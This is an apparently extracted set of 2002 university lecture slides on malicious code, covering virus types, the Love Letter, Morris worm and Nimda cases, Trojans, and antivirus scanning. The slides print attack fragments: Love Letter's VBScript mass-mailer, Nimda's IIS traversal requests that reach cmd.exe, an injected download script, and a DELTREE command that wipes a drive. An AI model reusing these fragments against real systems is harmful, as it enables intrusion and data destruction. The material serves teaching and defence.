2/13/02 Chapter 13 Malicious Code.

2/13/02 Chapter 13 Malicious Code. 1

Chapter 13: Malicious Code

A class of unwanted software, often called “Malware”.

3 major arrival scenarios:

Arrives with the help of the user (opens a contaminated file).Arrives on its own (a vulnerability or “feature” allows execution)Is left behind after an adversary breaks in.

User assistance may be:

Unwitting – user didn’t have a clue.Witting – user knew better, but did it anyway .Half-witting – user knew better, but took a chance.


Malicious Code – Impact

May be benign or destructive. Why? Because malware typically contains an executable and can do anything an executable can do.

Even if benign, consumes resources (runs, replicates, occupies storage, consumes cpu cycles, slows the system down).

Takes time & effort to remove.

Example is happy.exe, presented a pretty happy new year graphicmessage for 1999.

Can’t really be sure they are benign - often don’t know.

If destructive, is clearly a much more serious menace.


Malicious Code – The Threat is Growing

Year New OS Know VirusesVulnerabilities

1998 262 40,0001999 417 48,0002000 1,090 55,0002001 2,437 59,000

While viruses grow rather linearly, new OS vulnerabilities are more than doubling every year !!!

Source: Computerworld, April 1, 2002, page 46.


Malicious Code – Why is the threat growing?

Increased # of products (e.g., wireless, PDA’s, new OS versions).

Better delivery methods – web expansion in the middle to late 90s.

Experience of malware developers – from an infant industry to highly experienced in the past decade.

Commitment of nation states to information warfare. Do we really know who is launching the attacks & developing codes?

Fast spreading time to reach # 1 in infected systems – Form virus (2-3 years), Concept macro virus (2-3 months), NIMDA (22 minutes).


Malicious Code - Taxonomy

Malicious Software(Malware)

Requires HostProgram

Does Not RequireHost Program

LogicBombs

TrojanHorses

Viruses Worms Bacteria

Do Not Replicate Do Replicate

All very nice, but now we have blended threats and other newcomers!


Malicious Code – A New Category

Hostile Java applets – code snippets that are executed by Java toperform some function, often embedded in a web page.

May belong on the “requires a host program” list. The host in this case is your browser with Java enabled. The applet is introduced to your system when you visit a web page containing the applet.

Two types – “malicious” and “attack” applets.

Malicious are in the wild and for the most part are annoying, but can be serious – can result in denial of service and invasion of privacy.

Attack applets are not yet in the wild, but have been extensively tested in lab settings. They attempt to compromise the Java security model and break through to your system.


Entrance Paths

Logic Bombs, Trojans, Viruses

1. Integral to or attached to an executable program, including macros that are enabled to be executed when a file is opened.2. Transported by media (e.g., floppy, tape, CD-ROM) OR arriveover the network as attached or directly executable programs.

Worms, Bacteria

1. Do not require a host program for transport.2. Arrive directly from the network – capable of self-propagation.

Applets

1. Are part of a web page you visit.2. If Java is enabled, the applet will execute and do its thing.


Virus Behavior

Aptly named - behave like biological viruses.

1. Typically small programs.2. Are attached, or attach themselves to executable files (e.g., a program, a script, or a command string).3. Activate when the host program is executed.4. May be benign or malignant (i.e., destructive).5. Capable of doing anything a program can do.6. Generally cannot infect a system from a non-executable file.7. Do not cause physical damage.8. Can also infect firmware (e.g., flash ROM in modems, BIOS).9. Typically activate on an event (e.g., when executed, on a date, after n re-boots, at some random time).10. Often replicate and attempt to infect other files (e.g., Melissa).


Indications of a Virus

1. Computer runs slow.2. System runs out of free space.3. File sizes change.4. Unexplained files appear on the hard drive.5. Unexplained behavior:

- CD-ROM drawer opens and close on its own (a joke virus).- Programs won’t execute- Files won’t open- Characters missing from displays- Obscene language appears on the display

And almost any other strange behavior you can imagine.


Flash Memory Viruses

Flash memory - writeable firmware. Found in:

PCBIOS, Modems, Video cards, Printers, Routers, etc.

Increasing use - allows changes to a hardware devices afterManufacture.

Example uses of flash memory:

1. 56k modem - two pre-standard designs - sold with flash memory - when V.90 standard issued, downloadable upgrade.2. Routers - downloadable protocol changes, support new protocols.3. Other devices – bug, performance updates fixes.


Virus Types

Companion - uses the execution hierarchy (order) of the system.

Parasitic - attaches to a host program and executes when host program executes.

OS Structure - attaches to OS components (e.g., boot blocks).

Macro - infect macro languages (e.g., Word, Excel).

Polymorphic - mutate with each infection.

Stealth - attempt to hide from detection.

Jokes & Hoaxes - Do nothing but excite some users.


Companion Viruses

Rely on the execution order of a system (e.g., in Windows the order is .COM, .EXE, and .BAT).

User specifies execute WP meaning WP.EXE. The OS will search for WP.COM, then WP.EXE.

If a virus exists called WP.COM - it will execute first and often attach itself to WP.EXE.

Using common names has been an often used technique to trick users into unwittingly executing a virus program.


Typical Method of Infection

Scenario: Shows before/after virus infection with a programmed target of certain .EXE and .COM files

Hdr IP JUMP Hdr IP JUMP

START

END

START

END

START

END

START

END

Virus

Jump

Virus

Jump

Before Infection After Infection

.EXE .COM .COM.EXE


Virus Wars - A Typical Scenario - .EXE File

MZ

CS

IP

Size

START

END

MZ Signature = Executable File

CS & IP are pointers to the startof the program image

Size specifies the image size

Program Load Image

Overlay data(e.g., buffer space)

File header

Virus must change size of the image. Respond by storingthe size somewhere else. Thenvirus writer compresses theinfected image to be the sameas before. Respond by usinga digital signature…….

On and on it goes!


Parasitic Viruses

Enter a system already attached to what appears to be a legitimateexecutable file.

In the preceding example, a parasitic virus would enter a system already attached to, for example, a .COM or .EXE file as shown in the "after infection" case.

Once run, the virus code could seek out other existing files with the same .COM or .EXE extensions and infect them.


Operating System Structure Viruses

Attach themselves to executable parts of the OS structure and/orinsert themselves in unused OS structures. These are prime targets since they execute when the system boots. For example:

Master Boot Record (MBR & Partition table)Unused sectors at beginning of the diskBoot recordFile Allocation Table (FAT)Directory recordBad sectorsUnused tracks at the end of the disk

In Microsoft – modify the registry so the virus executes at startup.


Typical Bootstrap Process

ExecuteH/W boot

Read S/Wboot to RAM

TransferControl to RAM

Find & LoadOperating Sys.

TransferControl to OS

On power-up, BIOS ROM holds program to test basich/w and identify boot device (e.g., floppy, hard drive).

BIOS program completes checks and executes a set of simple load to memory instructions to load a more robustloader (e.g., the initial loader)into primary memory.

Once, the initial loader is resident, control is transferred to the starting location of the initial loader.

The initial loader identifies the location of the operating system and loads the resident parts of the OS to memory.

When loading completes, control is transferred to the operating system (e.g., the null cli prompt appears).

The process includes a number of validation tests including simple signatures(not cryptographic), such as a 2 Byte checksum.


Typical Bootstrap Process - Infected Boot Record

ExecuteH/W boot

Read S/Wboot to RAM

TransferControl to RAM

Find & LoadOperating Sys.

TransferControl to OS

In an infected system, the initial loader is replaced withan infected loader

BIOS program completes checks and and loads the infectedloader into primary memory.

Once the infected loader is resident control is transferred to the starting location of the virus.

The virus loads 1st, makes changes it was designed for (e.g.,may erase its tracks, infect the hard drive, etc.) and thentransfers control to the original loader.

The OS then loads normally and control is transferred to theoperating system (e.g., the null cli prompt appears).

At this point the virus is resident and executable - it will execute and act according to its design.

Virus loads


A Specific Infection - The Michelangelo Virus

1. Infected diskette is placed in the A: drive and booted.2. Diskette boot program loads the virus into main memory. 3. Infects the hard drive by moving the hard drive's original boot block to another location on the disk, and installing itself in the boot block.

Every time a disk is mounted on the system that disk is infected as well.

Part of the virus program reads the system date. On March 6, the virus activates and overwrites:

Any mounted diskette with random characters, andhard disk sectors 1-17, heads 0-3, and tracks 0-255 (with random characters).


LOVE LETTER VIRUS – WORM?

May 4, 2000 “Love Letter” is released from the Phillipines. Uses Microsoft vbs scripting language (requires Windows scripting hostbe installed before it could run). Check My Computer, View, Options, File Types & look for VBScript.

Infects Microsoft Windows machines if the scripting host is enabled.

Infection is by e-mail, but can also be via shared files, USENET news, and Internet Relay Chat.

E-mail – Outlook users get a message with subject line “ILOVE YOU” and a body that reads “kindly check the attached LOVELETTER coming from me”. It has an attachment named:

LOVE-LETTER-FOR-YOU.TXT.VBS

Usually, the return address will be a person known to the victim.


LOVE LETTER VIRUS – What it does or trys

• Replaces certain files with a copy of itself. • Sends itself to other potential victims found in the previous victims Outlook address book. • Modifies Explorer’s home page URL. • Modifies several registry keys. • Makes an Internet relay Chat script.

• Sniffs passwords and attempts to mail them to an Internet site.


Main

regruns

html

spreadtoemail

listadriv

LOVE LETTER VIRUS – Program Structure


LOVE LETTER VIRUS – File Replacement - listadriv

Main copies virus to multiple locations and calls the subroutines.

Searches for all drives and certain file extensions and takes the following file-dependent actions

• If file = vbs or vbe (Visual basic), replace the file with a copy of itself.• If file is js, jse, css, wsh, sct, or hta, replace the file with itself and change the extension to vbs. • If file is jpg or jpeg, replace the file with itself and append a vbs extension (abc.jpeg becomes abc.jpeg.vbs.

• If file is mp3 or mp2, replace the file with itself and append a vbs extension (abc.mp3 becomes abc.mp3.vbs) and mark as hidden.


LOVE LETTER – send e-mail - spreadtoemail

Generates e-mail with sender = current victim sends itself to every entry in the local Outlook mailbox. Also tries to read the Exchange server’s mail directory and send itself to every address found there.

Set out = Wscript.CreateObject(“Outlook application”)Set mail – out.Createitem(0)Set mailaddress = %scriptto get user from address book%Mail.Recipients.add(mailaddress)Mail.Subject = “I LOVE YOU”Mail.body = vbcrlf&”kindly check the attached LOVELETTER coming from me.”Mail.Attachments.Add(dirsystem&”\LOVE-LETTERE-FOR-YOU.TXT.vbs”)Mail.send


LOVE LETTER VIRUS – Home page - html

If the file <DIRSYSTEM>\WinFAT32.exe does not exist, the worm:

• Set Explorer home page to one of four randomly selected pages. These URLs all refer to locations that contain a file WIN-BUGSFIX.exe • WIN-BUGSFIX.exe contains code for cracking passwords on the victim’s machine and mailing them to an ISP in the Phillipines • The worm also looks for this code in the Explorer download directory and when it is found, it is added to the victim’s start list of programs that run at startup • Finally, the Explorer start page is set to “about:blank”


LOVE LETTER VIRUS – Registry changes -regruns

Creates registry entry:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Mskernel32”,dirsystem&”\MSKernel32.vbs•HKLM\Software\Microsoft\Windows\Current\Version\Run\Services\Win32DLL•HKLM\Software\Microsoft\Windows\Current\Version\Run\WIN-BUGSFIX•HKLU\Software\Microsoft\Windows Scripting Host\Settings\Timeout•HKLU\Software\Microsoft\Internet Explorer\Main\Start Page•HKLU\Software\Microsoft\WAB\*

This virus was widespread – worldwide within a few hours.

Would have done more damage, except scripting was not enabledon many systems.

Damage was mainly the cost of eradication.


Macro Viruses

Very popular virus family that relies on the use of executable macrolanguages that can be embedded in documents - often to createformatting for templates, etc.

For example, in Microsoft Word, anytime a template file is opened,it is scanned for macros. If it contains an AutoOpen, the Macro instructions are immediately executed.

If the AutoOpen Macro is infected the user only has to open the filefor the virus to run. One of the things these viruses often do is to update the global macro pool so other documents that use the Macropool will also be infected.


Polymorphic Viruses - Multiple Versions

Conventional methods of virus eradication rely on detecting the unique signature of a virus. In order to make this more difficult, virus developers often build viruses that contain self-modifying code.

Structures for these viruses include:

The original virusA program that encodes the original codeA decoder to recover the original virusA mutation engine that changes the decoding routine(adding code like LOOPS or NO OPERATION instructions)

These change the external signature of the code, do not change the decoded result. Consequently, they mask the virus from detection.


Stealth Viruses

Infects a program and then attempts to hide itself from detection by active measures. Two types - Size stealth and read stealth:

Size stealth attempt to 1) measure the length of the good file, 2) infectit, and 3) compress the infected file back to the length of the original.

Read stealth inserts the virus code between the OS and all calls to readfiles (e.g., by a virus scanner). On read, the virus intercepts the call andreturns an un-infected file. The Stoned Monkey Master Boot Recordvirus is a read stealth virus.

These methods require the virus to be memory resident so they canintercept system I/O calls. Booting from a known clean floppy andscanning will find these infections (if they are known).


Stealth Virus - Hiding Places


Bacteria

Do not require host programs, but replicate and spread.

In 1987, the IBM Christmas Bacteria was launched in BitNet, a WAN for university e-mail.

It arrived as an e-mail attachment. When opened, it rendered a Christmas tree on the screen, replicated itself, and sent a copy of itself to every mailbox on the user’s local mail distribution list. It spread sorapidly that BitNet had to be shut down for several days.

Sound familiar? Like perhaps, Melissa?

Melissa was uniformly labeled a virus - since it used an e-mailmessage as the host - not clear if there are any real bacteria.


Worms

No requirement for a host program - independently travels over the network, finding, infecting, replicating, and moving on.No requirement for a user to take any action - infection happens!

These capabilities are also considered useful tools for:

Propagating useful network information (e.g., configuration files).Remote software distribution & installation (e.g., automatic downloads).

There are some requirements:

1. An initial system to act as the launch platform.2. Access to a network (typically via e-mail or IP address).3. Network services enabled (e.g., mail).


Worm - Methods

Searches for other network systems known to the original host. computer (e.g., by e-mail or IP address). On ID - establish a communications link to the remote system. Attempts to exploit a software weakness. On success, downloads a copy of the worm from the attacking system. Process is repeated for every successful intrusion. Spreads rapidly and can easily monopolize the system and network.

The best known worm: "Internet worm" – Robert MorrisAttacked Unix BSD systems(e.g., Sun 3 & VAX running BSD) Launched on 11/2/88 - 6000 systems

Three-pronged attack: “Remote Shell”“Sendmail”“fingerid”


Remote Shell Attack

Remote shell allows a user to run a shell from a remote location. Attack # 1: try to spawn remote shell (rsh) process, try

/usr/ucb/rsh, or/usr/bin/rsh, or/bin/rsh

If rsh enabled, establish a TCP/IP connection back to the attacking machine, and download the worm so it could be compiled, linked and executed. When done disconnect.


Sendmail Attack

Sendmail is a Unix mailer designed to route mail in a network environment using a mailer daemon (background process).

When enabled, the mailer listens on TCP Port #25 for attempts to deliver mail by Simple Mail Transfer Protocol (SMTP).

On a successful TCP connection attempt, the daemon makes the connection and gets:

SenderRecipientDelivery instructions, andMessage contents

Trouble was, there was a debug option in the Sendmail program thatwas not turned off.


Sendmail Attack

The worm issued a DEBUG command to the remote system, and acommand string instead of the user address.

Such commands are not allowed in normal mode, but OK in debug sotesters can determine mail is arriving at remote locations without actually sending mail or remotely logging in.

If debug is turned on - this made it easy to configure sendmail to furthertesting --- However, this also allowed the same actions as for rsh.

This means a remote user had user privileges on the system.


Fingerid Attack

Fingerid is a utility that allows a user to get information about other network users.It is used to get full name or login name of a user and whether they are logged in, their telephone number, etc.

It is a daemon running in background to respond to requests. It acceptsremote connections, reads a single line, and returns requested information.

The exploit overran the fingerid buffer by sending a special 536 byte string to fingerid causing the stack to be overwritten such that the return was corrupted and returned to a remote shell program that proceeded to establish the TCP/IP connection as before.


Sidebar – Buffer Overflow Attacks

Manipulates the input buffer to allow the attacker to execute arbitrary commands on the target machine.

Result of the poor programming practice of not writing code that checksthe bounds on an input data string supplied to a program.

When receiving input, a program calls the input routine and passes arguments specifying the location of buffers for the input data. The callpasses the arguments and the return address to the input routine and transfers control to the input routine.

The input routine pushes the arguments and the return pointer on the stack, then pushes the input data stream on the stack. When complete,the input routine returns control to the calling program specified in thereturn address.


Stack – LIFO Architecture

Low Memory

High Memory

Input variable 2

Input variable 1

Return Pointer

Call ArgumentsLast-In, First-Out (LIFO):Items are pushed on theStack in order and poppedOff the stack in reverse order.


Corrupting the Stack

Low Memory

High Memory

Input variable 2

Executable code (e.g., a shell command)

New Pointer to executable code

Call Arguments

When return is executed, theShell is run – the attacker thenconnects to the shell.


Worm Code - Main

Main collected information on other computers known to this one byreading public configuration files. It also ran system utilities. Thisinformation formed the database for further attacks.

In each successful case the worm attempted to hide its existence by unlinking its binary, killing its parent process, encrypting and reading its files into memory, and deleting files created during entry.

Periodically it forked itself and killed its parent so it had a continuously changing process ID to help avoid detection. Every 12 hours it erased its own records of hosts it had infected so they became eligible for infection again.


It also reads and cracks local password files. Password cracker:

UNIX passwords are stored in a public file, but encrypted with a DES variant. The algorithm is non-invertible

However, Unix allowed the encryption of password lists and comparison to the password file without calling an OS function (i.e., no log interception).

Didn’t do anything exotic - just tried lists of common words until it found an encrypted MATCH - No encryption breakageSome sites reported 50% of passwords were compromised.

This gave the worm access to additional accounts and more possibledestinations for mail and IP.

Worm Code - Main


Worm - Impact

Eventually contaminated over 6000 Unix systems.

First fix was available within 12 hours of discovery. By 28 hours a method to stop propagation was posted.

Trouble was, there was no structured response - all was “ad hoc” andthrough the informal network of colleagues.

Resulted in establishment of DARPA funded CERT "Computer Emergency Response Team" at Carnegie Mellon University.

Later DOE created CIAC - Computer Incident Advisory Capabilityat Lawrence Livermore National Laboratory.


Anti-Virus Web Sites

http://www.cert.orghttp://www.symantec.comhttp://www.antivirus.comhttp://www.nai.comhttp://www.icsa.comhttp://www.sans.orghttp://www.fprot.comhttp://www.datafellows.comhttp://www.ciac.orghttp://www.wildlist.org

http://www.cert.org/

http://www.symantec.com/

http://www.antivirus.com/

http://www.nai.com/

http://www.icsa.com/

http://www.sans.org/

http://www.fprot.com/

http://www.datafellows.com/

http://www.ciac.org/

http://www.wildlist.org/


Fast Forward – Sophistication – Nimda

Appeared September 18, 2001.

Affected Windows 95/98, ME, NT4, 2000 – clever version code.

Combination virus/worm – it is not clear distinction is useful any more.

Serious impact to infected systems.

Side effect created large volumes of Internet traffic at web serversknown to the Internet.

Few sites escaped from Nimda.


Nimda Propagation & Infection – 4 modes

Modifies .exe fileson the victim so theyinclude the worm.

Sends email containing the worm to all addresses found in the in-box and address book of the victim.

Searches for vulnerable IIS servers, compromises the server and down-loads the worm. Worm infects web pages so other systems browsing the server will also be infected.

Searches the Local Area Network for shared files on servers or workstations and puts a hidden copy of the worm on file shares. Opening documents in these directories cause the worm to be executed.


e-Mail Compromise

Impacts Outlook and Outlook Express.

An e-mail arrives with an attachment named “readme.exe.

On older un-patched systems, the attachment is automatically executedwhen the e-Mail is opened and readme.exe, the worm, is executed.

On patched or un-patched systems, readme will execute if doubleclicked.

The worm then harvests e-mail address from the in-box and address book of the infected system.


IIS (Microsoft Web Server) Compromise

Infected systems form IP addresses (some targeted, some random) andattempts to compromise IIS servers with 4 different attacks:

1. Two scripts to exploit the root.exe back-door left by Code Red II orSadmind prior infections. If successful gives root privilege to the worm. GET/scripts/root.exe?/c+dir HTTP/1.0” 404 210”-” ”-”GET/MSADC/root.exe?/c+dir HTTP/1.0 404 201 “-” “-”

2. Two more for Code Red II backdoors where the C: and D: drives were mapped to IIS virtual folders allowing access to cmd.exe (WinCLI with administrator privilege).

GET/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 218 “-” “-”GET/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0 404 218 “-” “-”



3. Two scripts to exploit the IIS/PWS Escaped Character DecodingCommand Execution vulnerability GET/scripts/..%255c../winnt/system32/cmd.exe?/……..GET/_vti_bin/..%255../..%255../winnt/system32/cmd.exe?/…..

If un-patched, causes server to decode the requested pathname twice. On decode 1, security is checked. If security is OK, the second decode is not checked again.

The first script is legal and passes security, but the second is not and allows the execution of cmd.exe, the Windows command line interpreterwith administrator privilege.

A patch has been available for some time from Microsoft.



4. 8 scripts to exploit the IIS/PWS Extended Unicode DirectoryTraversal vulnerability (only 2 are shown below): GET/scripts/..%c1%1c../winnt/system32/cmd.exe?/……..GET/scripts/..%c0%2f../winnt/system32/cmd.exe?/…..

If un-patched, IIS does not validate the input correctly and allows inappropriate directory access when the / and \ characters are encodedwith their Unicode equivalents. In the examples:

%c1%1c is / and %c0%2f is \ in the Chinese Unicode character set

Note: Unicode is the extended character encoding standard used torepresent letters and symbols from all the languages in the world.


IIS (Microsoft Web Server) Compromise – Summary

1. Exploit root.exe or cmd.exe backdoors left by Code Red II.2. Exploit IIS Directory Traversal vulnerability allowing files to beaccessed if they reside on the same drive as the server web folders.3. Exploit the IIS Escaped Character Decoding Commend execution vulnerability that allows files to be accessed and executed.

If successful, the worm uses the trivial file transfer protocol (tftp) toconnect back to the system originating the attack to download and execute Admin.dll the main body of the worm.

END OF MALWARE CHAPTER


Web Browser Compromise

Users browsing the web may encounter an IIS server that has beencompromised by the worm. One of the changes the worm makes is to search an infected IIS server for HTM, HTML, and ASP files and append a java script to each file it finds.

The script attempts to download a readme.eml file to the browser. If the browser is a vulnerable version of Internet Explore, the eml fileExecutes and infects the user’s system. The code is:

<html><script>language=<“javascript”>window.open(“readme.eml”, null, “resizable=no, top=6000, left=6000”)</script></html>


Modifications to the Victim after infection

Searches for executable files on hard drive, inserts itself into the executable and runs whenever the executable runs. Includes:

All files in registry application path.SYSTEM.INI so it runs every time the system boots.

All folders containing .DOC files so it runs when WORDor WordPad runs.All folders containing HTM, HTML, or ASP files so it runs when a browser opens one of these files.

On NT/2000 systems adds an account named guest to the local administrators group, gives it a blank password, and turns the account “on”.

On 9x/ME systems, configures all local drives as shared for user “guest”.


NIMDA Prevention

Apply Microsoft patches to IIS Servers.

Check for Code Red II backdoors from earlier infection.

Patch Internet Explore to eliminate automatic execution of embeddedMIME types.

Disable Java script.

Don’t execute attached e-mail files.


Trojan Horses

Based on the well-known story by Virgil in Aeneid, Book II.

Appears to perform a useful function, but contains code that performsand unexpected, typically not useful, possibly malicious function.

Trojans include:

Excel Easter EggNetBusBackOrificeBacknoteAolfree.com

The important thing is these codes typically advertise themselves as performing useful functions to get users to download and execute them.


Excel Easter Egg

Excel 97 contained a program embedded inside the spreadsheet program – the program performed a very different, and unexpectedfunction.

If the user pressed the F5 key and entered X97:L97 <enter><tab>,Then held down ,Ctrl-Shft>, and clicked on the wizard chart

Behold …. A flight simulator appeared with a rudimentary landscapethat could be navigated (flown over).

If the user navigated to the correct point, the names of the developerscould be observed. Rather a boring program…but classical Trojan

For others – search Google on “Easter Eggs”.


Netbus

Aliases: Netbus.153, Netbus.160, Netbus.170

Distribution: Typically e-mail, but found in newsgroups as well.

Function: Client-Server application that allows a remote user to control a PC (Windows 95/98 & NT). Server is installed on the victim in Windows dir and executes when Windows boots. It is stealthy - hides process name, denies delete/rename access, can vary its execution schedule & remove itself. Client (at hacker end) controls the system over TCP/IP and allows many functions to be performed - some really nasty.


Netbus Features

Open/Close CD tray; show BMP or JPEG image, swap mouse buttons.Start an application, play WAV file, point mouse to some coordinate.Show a message box and allow the victim to respond.Shutdown Windows, reboot, logoff, power off.Send keystrokes to the active application on the victim.Get a screenshot from the victim, return system information.Upload (push) any file to the victim.Change sound volume, records sounds from the victim’s microphone.Download and/or delete any file on the victim’s system.Make clicking sounds every time the victim presses a key.Block certain keys on the victims system.…...


Back Orifice

Alias: BO, BOSniffer, CDC-BO, BOSERVE, BOCLIENT, Ofrifice.srvOrifice.addon, Hacktool.

Distribution: e-mail, newsgroups, bulletin boards.

Function: Very similar to Netbus (Netbus pre-dates back Orifice).

One of the aliases, BOSniffer, claims to be able to detect Back Orifice,while in reality it is the Back orifice application itself.


Backnote

Aliases: URLSnoop, PICTURE.EXE, MANAGER.EXE

Size: ~ 350kB

Distributed: e-mail attachment and newsgroup postings.

Function: Copy themselves to Windows dir; NOTE.EXE. Register themselves for execution when Windows boots. On execution, gathers machine information, including usernames & passwords. Copies information to an encrypted .DAT file Attempts to e-mail the file to [email protected] & [email protected].


AOL Free - A Whole Series of Trojans

At one time AOL distributed AOL4FREE to Mac users.

In early 1997, an e-mail went around saying AOL4FREE.COM was a destructive virus.

In March 1997, the major anti-virus vendors declared AOL4FREE.COMa virus hoax.

In April 1997, a real virus named AOL4FREE.COM was released -never spread very far, but did the following:

C:CD\DELTREE /y *.*


Logic Bombs

Program or block of code embedded in a useful program.

Scheduled to execute based on some future event (time, day, if a certain user account exists or a certain file exists - many options).

On e-day, the program executes, usually with disastrous results.

1985 Insurance Company example.

Two days after an employee was fired, the bomb went off.

Deleted 168,000 employee records.

Perpetrator was fined $11,800 and served 7 years probation.


Prevention Measures - Better than the cure

Perform regular backups of all important files.

Do not introduce new media (CD, floppy, zip) to a system that has notbeen backed up.

Better, scan all media for viruses with a current scanner.

Do not open e-mail attachments, download executables, etc. unlessyou are sure of the source.

For any software you import, scan it before opening & executing.

Even some commercial software distributions have been contaminated.


Virus Scanners - Scanning & Remediation

Scan the entire system including memory & disk files.

Detect the presence of a virus - if the scanner knows the virus.

Identifies the specific virus infesting the system.

Removes the offending virus restoring the system.

NOT ALWAYS SUCCESSFUL - may not recognize or remove.

Then Restore from backups.Worst case, re-format the hard drive, andRebuild the system


Virus Scanners - Early Years

In the beginning, there were few viruses. Respond by:

Get virus - key point is to have a copy of the virus.Examine it.Build recognizer and dis-infector.

Methods used were based on how viruses infect.Used simple string scanning and pattern recognition. Memory and secondary storage locations including disk bootrecords were scanned.Specific bit sequences were used to identified specific viruses. Relied on known lengths to identify and remove malicious code.

The volume of viruses have overwhelmed these largely manual methods.


Virus Scanners - Simple Example of Infection

Adds itself to the end of an executable (any one will do).Modifies the header code to point at the virus (JUMP to virus).Saves the beginning part of the file it changed (from jump to real program to jump to virus).

Entry Point Legitimate program headerVVVVVVV The virus jump codeVictim program The legitimate program codeExit Original exitVirus The virus action codeRestore victim Virus code that restores the victim so it executesJUMP Virus return to repaired victim


Virus Scanners - Remediation

1. Find the virus: do a string search2. Find original beginning of victim: After virus jump3. Find size of virus - look-up based on virus lab examination

Fix by:

Remove Jump, move original entry point to jump. Truncate the file at original end of victim by calculating from size.

This is: TediousTo slow with virus population expandingEasily defeated by adding superfluous instructionsto virus string during replication (varying size)


Virus Scanners - Anti-Virus Developers

Added wild card scanner, looking only for special signatures.

Heuristic scanning rules to look for generic behavior.

Add integrity checks to executables, test before execution.

Trouble was:

Signature database grew to be cumbersomeScanning got slower and intrusive

Move has been to more generic scanners, interception of suspiciousbehavior (e.g., writing to master boot blocks).


Modern Scanners

Memory resident - scan every file on accessOn-line profile updates - to keep database currentSignature scanning - looking for unique signaturesGeneric decryptors:

Operate in single step instruction mode.Scan for suspicious activity.

Simulators - Emulate instruction execution in a virtual mode - don’t actually execute the instruction on the real machine, execute it in aprotected “sandbox” while observing behavior.

Combine simulation and signature analysis.


Combining Simulation & Signatures - Virus Signs:

1. Encryption. A code decryptor is found.

2. Attempts to Open an executable file.

3. Suspicious file access (certain files like system files).

4. Time/date event trigger routines (time/date test).

5. Memory resident code.

6. Interrupt hooks.

7. Undocumented interrupt calls.


Combining Simulation & Signatures - Virus Signs (more):

8. Self-Relocation in memory, especially if non-standard.

9. Programs that scan for memory size.

10. File search code - search for exe, com, bat files.

11. Strange memory allocation.

12. Replication - the code overwrites the start of other codes.

13. Anti-debugging code.

14. Direct disk access - not by OS call.


Combining Simulation & Signatures - Virus Signs (more):

15. Use of undocumented DOS features.

16. Program checks for .exe, .com extensions.

17. Program load trap.

18. Attempts to perform BIOS access.

Continuing effort on part of the virus developers to voidactions of anti-virus community and by anti-virus community to stayeven with the virus developers.

Very much like the real world of biological viruses.


Summary

Detect - based on samples of the virus contributed to an anti-virus vendor for action.

Analysis I - vendor observes the code and determines whether it is reliably detected with existing signature and heuristics capability.

Analysis II - determine the method to remove the virus by defining the entry point & length.

Remediation - write dis-infecting code for the specific virus.

Distribution - update profile, signature, and remediation libraryfor on-line distribution.

2/13/02 Chapter 13 Malicious Code.

Documents

Transcript of 2/13/02 Chapter 13 Malicious Code.